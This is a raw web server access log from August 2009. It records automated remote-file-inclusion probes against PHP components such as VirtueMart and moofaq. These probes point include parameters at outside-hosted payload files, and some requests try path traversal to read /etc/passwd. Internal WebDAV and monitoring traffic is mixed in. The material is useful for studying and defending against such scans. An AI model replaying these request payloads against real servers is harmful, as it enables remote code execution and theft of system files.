201.232.54.48 - - [05/Aug/2009:08:51:19 -0400] "GET /logs/access_log.Q109061800/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.otr.co.kr/blog/css/logo_footer.jpg? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
172.16.1.69 - - [05/Aug/2009:08:51:31 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.69 - - [05/Aug/2009:08:51:31 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.69 - - [05/Aug/2009:08:51:31 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.176 - - [05/Aug/2009:08:52:07 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.176 - - [05/Aug/2009:08:52:07 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.176 - - [05/Aug/2009:08:52:07 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
94.23.205.32 - - [05/Aug/2009:08:52:09 -0400] "GET /logs/access_log.Q109060500//?option=com_events&task=view&Itemid=&mosConfig_absolute_path=http://www.wsfiz.siedlce.pl/templates/id.txt??? HTTP/1.1" 404 226 "-" "libwww-perl/5.803"
208.113.196.16 - - [05/Aug/2009:08:52:09 -0400] "GET /logs/access_log.Q109061300%20%20/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://www.investment.kg/en/installationx/idxx.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
69.65.41.165 - - [05/Aug/2009:08:52:10 -0400] "GET /logs/access_log.Q109071700//?_SERVER[DOCUMENT_ROOT]=http://www.amembersignup.com/signup/id.txt??? HTTP/1.1" 404 226 "-" "libwww-perl/5.812"
69.65.41.165 - - [05/Aug/2009:08:52:10 -0400] "GET /logs/error_log.Q109071700//?_SERVER[DOCUMENT_ROOT]=http://www.amembersignup.com/signup/id.txt??? HTTP/1.1" 404 225 "-" "libwww-perl/5.812"
69.65.41.165 - - [05/Aug/2009:08:52:10 -0400] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.amembersignup.com/signup/id.txt??? HTTP/1.1" 200 452 "-" "libwww-perl/5.812"
69.65.41.165 - - [05/Aug/2009:08:52:10 -0400] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.amembersignup.com/signup/id.txt??? HTTP/1.1" 200 12411 "-" "libwww-perl/5.812"
172.16.1.82 - - [05/Aug/2009:08:52:13 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.82 - - [05/Aug/2009:08:52:13 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.82 - - [05/Aug/2009:08:52:13 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
208.113.196.16 - - [05/Aug/2009:08:52:14 -0400] "GET /logs/access_log.Q109062100%20%20/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://www.investment.kg/en/installationx/idxx.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
208.113.196.16 - - [05/Aug/2009:08:52:26 -0400] "GET /logs/access_log.Q109061300%20%20/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://www.investment.kg/en/installationx/idxx.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
208.113.196.16 - - [05/Aug/2009:08:52:29 -0400] "GET /logs/access_log.Q109062100%20%20/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://www.investment.kg/en/installationx/idxx.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
172.16.1.69 - - [05/Aug/2009:08:52:37 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.69 - - [05/Aug/2009:08:52:37 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.69 - - [05/Aug/2009:08:52:37 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
209.59.12.99 - - [05/Aug/2009:08:52:51 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
172.16.1.180 - - [05/Aug/2009:08:52:59 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [05/Aug/2009:08:52:59 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [05/Aug/2009:08:52:59 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
217.67.239.230 - - [05/Aug/2009:08:53:06 -0400] "GET /logs/access_log.Q109052300/phphtml.php?htmlclass_path=http://www.karjatie.fi/readme.txt?? HTTP/1.1" 404 236 "-" "libwww-perl/5.813"
217.67.239.230 - - [05/Aug/2009:08:53:06 -0400] "GET /phphtml.php?htmlclass_path=http://www.karjatie.fi/readme.txt?? HTTP/1.1" 404 209 "-" "libwww-perl/5.813"
217.67.239.230 - - [05/Aug/2009:08:53:06 -0400] "GET /logs/phphtml.php?htmlclass_path=http://www.karjatie.fi/readme.txt?? HTTP/1.1" 404 214 "-" "libwww-perl/5.813"
210.220.213.203 - - [05/Aug/2009:08:53:11 -0400] "GET /logs/access_log.Q109063000%20%20/?_zb_path=http://ashaclub.com/bbs/lib/id1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
210.220.213.203 - - [05/Aug/2009:08:53:11 -0400] "GET /?_zb_path=http://ashaclub.com/bbs/lib/id1.txt? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
210.220.213.203 - - [05/Aug/2009:08:53:11 -0400] "GET /logs/?_zb_path=http://ashaclub.com/bbs/lib/id1.txt? HTTP/1.1" 200 12406 "-" "Mozilla/5.0"
66.244.128.29 - - [05/Aug/2009:08:53:44 -0400] "GET //components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.medisite.fr/id??? HTTP/1.1" 404 247 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
66.244.128.29 - - [05/Aug/2009:08:53:44 -0400] "GET /logs//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.medisite.fr/id??? HTTP/1.1" 404 252 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
218.55.227.145 - - [05/Aug/2009:08:53:47 -0400] "GET //include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.karjatie.fi/readme.txt?? HTTP/1.1" 404 237 "-" "libwww-perl/5.79"
217.70.32.2 - - [05/Aug/2009:08:54:12 -0400] "GET /logs/access_log.Q109071600//?_SERVER[DOCUMENT_ROOT]=http://www.amembersignup.com/signup/id.txt??? HTTP/1.1" 404 226 "-" "libwww-perl/5.803"
217.70.32.2 - - [05/Aug/2009:08:54:12 -0400] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.amembersignup.com/signup/id.txt??? HTTP/1.1" 200 452 "-" "libwww-perl/5.803"
217.70.32.2 - - [05/Aug/2009:08:54:12 -0400] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.amembersignup.com/signup/id.txt??? HTTP/1.1" 200 12411 "-" "libwww-perl/5.803"
217.70.32.2 - - [05/Aug/2009:08:54:13 -0400] "GET /logs/error_log.Q109071700//?_SERVER[DOCUMENT_ROOT]=http://www.amembersignup.com/signup/id.txt??? HTTP/1.1" 404 225 "-" "libwww-perl/5.803"
94.23.205.32 - - [05/Aug/2009:08:54:20 -0400] "GET /logs/access_log.Q109051500%20//?option=com_events&task=view&Itemid=&mosConfig_absolute_path=http://www.wsfiz.siedlce.pl/templates/id.txt??? HTTP/1.1" 404 227 "-" "libwww-perl/5.803"
172.16.1.180 - - [05/Aug/2009:08:54:20 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [05/Aug/2009:08:54:20 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [05/Aug/2009:08:54:20 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
222.122.6.62 - - [05/Aug/2009:08:54:48 -0400] "GET /logs/access_log.Q109051600//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://bruntil.com/cgi/fx29id1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
222.122.6.62 - - [05/Aug/2009:08:54:48 -0400] "GET /logs/access_log.Q109051500//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://bruntil.com/cgi/fx29id1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
222.122.6.62 - - [05/Aug/2009:08:54:48 -0400] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://bruntil.com/cgi/fx29id1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
222.122.6.62 - - [05/Aug/2009:08:54:51 -0400] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://bruntil.com/cgi/fx29id1.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
74.53.201.178 - - [05/Aug/2009:08:55:06 -0400] "GET /logs/access_log.Q109063000//skin/zero_vote/ask_password.php?dir=http://www.hitprom.co.rs/.injek/id1.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
217.67.239.230 - - [05/Aug/2009:08:55:15 -0400] "GET /logs/error_log.Q109052300/phphtml.php?htmlclass_path=http://www.karjatie.fi/readme.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.813"
172.16.1.180 - - [05/Aug/2009:08:55:21 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [05/Aug/2009:08:55:21 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [05/Aug/2009:08:55:21 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
217.67.239.230 - - [05/Aug/2009:08:55:35 -0400] "GET /logs/access_log.Q109051600//include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.karjatie.fi/readme.txt?? HTTP/1.1" 404 264 "-" "libwww-perl/5.813"
217.67.239.230 - - [05/Aug/2009:08:55:35 -0400] "GET //include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.karjatie.fi/readme.txt?? HTTP/1.1" 404 237 "-" "libwww-perl/5.813"
217.67.239.230 - - [05/Aug/2009:08:55:35 -0400] "GET /logs//include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.karjatie.fi/readme.txt?? HTTP/1.1" 404 242 "-" "libwww-perl/5.813"
79.23.191.23 - - [05/Aug/2009:08:55:54 -0400] "GET //components/com_moofaq/includes/file_includer.php?gzip=0&file=http://roxxxx.altervista.org/id1.txt??? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
79.23.191.23 - - [05/Aug/2009:08:55:54 -0400] "GET /logs//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://roxxxx.altervista.org/id1.txt??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
72.32.69.162 - - [05/Aug/2009:08:55:57 -0400] "GET /logs/access_log.Q109070700//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.casgem.gov.tr/images/baner.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
72.32.69.162 - - [05/Aug/2009:08:55:57 -0400] "GET /logs//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.casgem.gov.tr/images/baner.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
72.32.69.162 - - [05/Aug/2009:08:55:57 -0400] "GET //components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.casgem.gov.tr/images/baner.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
72.32.69.162 - - [05/Aug/2009:08:55:57 -0400] "GET /logs/access_log.Q109062200//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.casgem.gov.tr/images/baner.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
79.23.191.23 - - [05/Aug/2009:08:55:57 -0400] "GET /logs/access_log.Q109070700//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://roxxxx.altervista.org/id1.txt??? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
210.112.170.41 - - [05/Aug/2009:08:55:58 -0400] "GET /errors.php?error=http://www.afi.w8w.pl/test.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
89.108.88.84 - - [05/Aug/2009:08:56:00 -0400] "GET /logs/access_log.Q109052900/site.php?meio=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
89.108.88.84 - - [05/Aug/2009:08:56:00 -0400] "GET /site.php?meio=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 206 "-" "libwww-perl/5.805"
89.108.88.84 - - [05/Aug/2009:08:56:00 -0400] "GET /logs/site.php?meio=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 211 "-" "libwww-perl/5.805"
210.112.170.41 - - [05/Aug/2009:08:56:05 -0400] "GET /logs/errors.php?error=http://www.afi.w8w.pl/test.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
79.23.191.23 - - [05/Aug/2009:08:56:09 -0400] "GET /logs/access_log.Q109062200//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://roxxxx.altervista.org/id1.txt??? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
91.121.174.74 - - [05/Aug/2009:08:56:19 -0400] "GET //components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.delawarepokernews.com/images/baner.jpg?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
91.121.174.74 - - [05/Aug/2009:08:56:19 -0400] "GET /logs//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.delawarepokernews.com/images/baner.jpg?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
91.121.174.74 - - [05/Aug/2009:08:56:19 -0400] "GET /logs/access_log.Q109070700//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.delawarepokernews.com/images/baner.jpg?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
91.121.174.74 - - [05/Aug/2009:08:56:19 -0400] "GET /logs/access_log.Q109062200//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.delawarepokernews.com/images/baner.jpg?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
172.16.1.180 - - [05/Aug/2009:08:56:31 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [05/Aug/2009:08:56:31 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [05/Aug/2009:08:56:31 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.176 - - [05/Aug/2009:08:56:35 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.176 - - [05/Aug/2009:08:56:35 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.176 - - [05/Aug/2009:08:56:35 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
217.67.239.230 - - [05/Aug/2009:08:57:08 -0400] "GET /logs/access_log.Q109061200//include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.karjatie.fi/readme.txt?? HTTP/1.1" 404 264 "-" "libwww-perl/5.813"
172.16.1.176 - - [05/Aug/2009:08:57:38 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.176 - - [05/Aug/2009:08:57:38 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.176 - - [05/Aug/2009:08:57:38 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
74.53.201.178 - - [05/Aug/2009:08:57:39 -0400] "GET /logs/access_log.Q109063000//skin/zero_vote/ask_password.php?dir=http://www.hitprom.co.rs/.injek/id1.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
204.12.11.202 - - [05/Aug/2009:08:57:42 -0400] "GET /logs//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.delawarepokernews.com/images/baner.jpg?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
204.12.11.202 - - [05/Aug/2009:08:57:42 -0400] "GET //components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.delawarepokernews.com/images/baner.jpg?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
204.12.11.202 - - [05/Aug/2009:08:57:42 -0400] "GET /logs/access_log.Q109070700%20%20//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.delawarepokernews.com/images/baner.jpg?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
204.12.11.202 - - [05/Aug/2009:08:57:42 -0400] "GET /logs/access_log.Q109062200%20%20//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.delawarepokernews.com/images/baner.jpg?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
91.121.174.74 - - [05/Aug/2009:08:57:55 -0400] "GET /logs/access_log.Q109070700%20%20//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.delawarepokernews.com/images/baner.jpg?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
91.121.174.74 - - [05/Aug/2009:08:57:55 -0400] "GET /logs/access_log.Q109062200%20%20//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.delawarepokernews.com/images/baner.jpg?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
72.32.69.162 - - [05/Aug/2009:08:57:57 -0400] "GET /logs/access_log.Q109070700%20%20//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.casgem.gov.tr/images/baner.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
172.16.1.80 - - [05/Aug/2009:08:57:58 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.80 - - [05/Aug/2009:08:57:58 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.80 - - [05/Aug/2009:08:57:58 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
72.32.69.162 - - [05/Aug/2009:08:58:00 -0400] "GET /logs/access_log.Q109062200%20%20//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.casgem.gov.tr/images/baner.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
172.16.1.170 - - [05/Aug/2009:08:58:06 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.170 - - [05/Aug/2009:08:58:06 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.170 - - [05/Aug/2009:08:58:06 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
89.108.88.84 - - [05/Aug/2009:08:58:26 -0400] "GET /logs/access_log.Q109070600/site.php?meio=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
172.16.1.180 - - [05/Aug/2009:08:58:35 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [05/Aug/2009:08:58:35 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [05/Aug/2009:08:58:35 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
222.236.221.38 - - [05/Aug/2009:08:58:40 -0400] "GET /logs/access_log.Q109070400//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://aokgroup.co.uk/cms/components/fx29id1.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
222.236.221.38 - - [05/Aug/2009:08:58:40 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://aokgroup.co.uk/cms/components/fx29id1.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
222.236.221.38 - - [05/Aug/2009:08:58:40 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://aokgroup.co.uk/cms/components/fx29id1.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
209.59.12.99 - - [05/Aug/2009:08:58:40 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
172.16.1.87 - - [05/Aug/2009:08:59:00 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.87 - - [05/Aug/2009:08:59:00 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.87 - - [05/Aug/2009:08:59:00 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
72.30.81.182 - - [05/Aug/2009:08:59:58 -0400] "GET /logs/ HTTP/1.0" 200 12406 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
204.12.11.202 - - [05/Aug/2009:09:00:19 -0400] "GET /logs/access_log.Q109070700//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.delawarepokernews.com/images/baner.jpg?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
204.12.11.202 - - [05/Aug/2009:09:00:23 -0400] "GET /logs/access_log.Q109062200//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.delawarepokernews.com/images/baner.jpg?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
218.145.160.123 - - [05/Aug/2009:09:00:51 -0400] "GET /logs/access_log.Q109071600/index.php?_SERVER[DOCUMENT_ROOT]=http://www.hongilsys.co.kr/tops/temp/idus.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
218.145.160.123 - - [05/Aug/2009:09:00:52 -0400] "GET /index.php?_SERVER[DOCUMENT_ROOT]=http://www.hongilsys.co.kr/tops/temp/idus.txt??? HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
218.145.160.123 - - [05/Aug/2009:09:00:52 -0400] "GET /logs/index.php?_SERVER[DOCUMENT_ROOT]=http://www.hongilsys.co.kr/tops/temp/idus.txt??? HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
218.145.160.123 - - [05/Aug/2009:09:01:01 -0400] "GET /logs/access_log.Q109071700/index.php?_SERVER[DOCUMENT_ROOT]=http://www.hongilsys.co.kr/tops/temp/idus.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
218.145.160.123 - - [05/Aug/2009:09:01:21 -0400] "GET /logs/access_log.Q109071600/index.php?_SERVER[DOCUMENT_ROOT]=http://www.hongilsys.co.kr/tops/temp/idus.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
218.145.160.123 - - [05/Aug/2009:09:01:21 -0400] "GET /index.php?_SERVER[DOCUMENT_ROOT]=http://www.hongilsys.co.kr/tops/temp/idus.txt??? HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
218.145.160.123 - - [05/Aug/2009:09:01:21 -0400] "GET /logs/index.php?_SERVER[DOCUMENT_ROOT]=http://www.hongilsys.co.kr/tops/temp/idus.txt??? HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
218.145.160.123 - - [05/Aug/2009:09:01:31 -0400] "GET /logs/access_log.Q109071700/index.php?_SERVER[DOCUMENT_ROOT]=http://www.hongilsys.co.kr/tops/temp/idus.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
172.16.1.87 - - [05/Aug/2009:09:01:49 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.87 - - [05/Aug/2009:09:01:49 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.87 - - [05/Aug/2009:09:01:49 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
63.174.244.10 - - [05/Aug/2009:09:01:53 -0400] "GET /logs/access_log.Q109063000%20%20//faqsupport/samplefaqsupport.php?path[docroot]=http://philip.semanticon.at/uploads/images/office1.jpg??? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
63.174.244.10 - - [05/Aug/2009:09:01:53 -0400] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://philip.semanticon.at/uploads/images/office1.jpg??? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
63.174.244.10 - - [05/Aug/2009:09:01:54 -0400] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://philip.semanticon.at/uploads/images/office1.jpg??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
218.145.160.123 - - [05/Aug/2009:09:02:01 -0400] "GET /logs/access_log.Q109071600%20/index.php?_SERVER[DOCUMENT_ROOT]=http://www.hongilsys.co.kr/tops/temp/idus.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
63.174.244.10 - - [05/Aug/2009:09:02:25 -0400] "GET /logs/access_log.Q109072900%20%20//faqsupport/samplefaqsupport.php?path[docroot]=http://philip.semanticon.at/uploads/images/office1.jpg??? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
218.145.160.123 - - [05/Aug/2009:09:02:31 -0400] "GET /logs/access_log.Q109071600%20/index.php?_SERVER[DOCUMENT_ROOT]=http://www.hongilsys.co.kr/tops/temp/idus.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
72.30.81.182 - - [05/Aug/2009:09:02:04 -0400] "GET /logs/access_log.Q109073100 HTTP/1.0" 200 3531011 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
72.30.81.182 - - [05/Aug/2009:09:02:45 -0400] "GET /logs/error_log.Q109080400 HTTP/1.0" 200 3126375 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
204.12.11.202 - - [05/Aug/2009:09:03:08 -0400] "GET /logs/access_log.Q109070700//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.detkreativeselskab.dk/yes.txt??? HTTP/1.1" 404 274 "-" "libwww-perl/5.829"
204.12.11.202 - - [05/Aug/2009:09:03:08 -0400] "GET /logs//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.detkreativeselskab.dk/yes.txt??? HTTP/1.1" 404 252 "-" "libwww-perl/5.829"
204.12.11.202 - - [05/Aug/2009:09:03:09 -0400] "GET //components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.detkreativeselskab.dk/yes.txt??? HTTP/1.1" 404 247 "-" "libwww-perl/5.829"
204.12.11.202 - - [05/Aug/2009:09:03:09 -0400] "GET /logs/access_log.Q109062200//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.detkreativeselskab.dk/yes.txt??? HTTP/1.1" 404 274 "-" "libwww-perl/5.829"
172.16.1.168 - - [05/Aug/2009:09:03:10 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.168 - - [05/Aug/2009:09:03:10 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.168 - - [05/Aug/2009:09:03:10 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.87 - - [05/Aug/2009:09:03:17 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
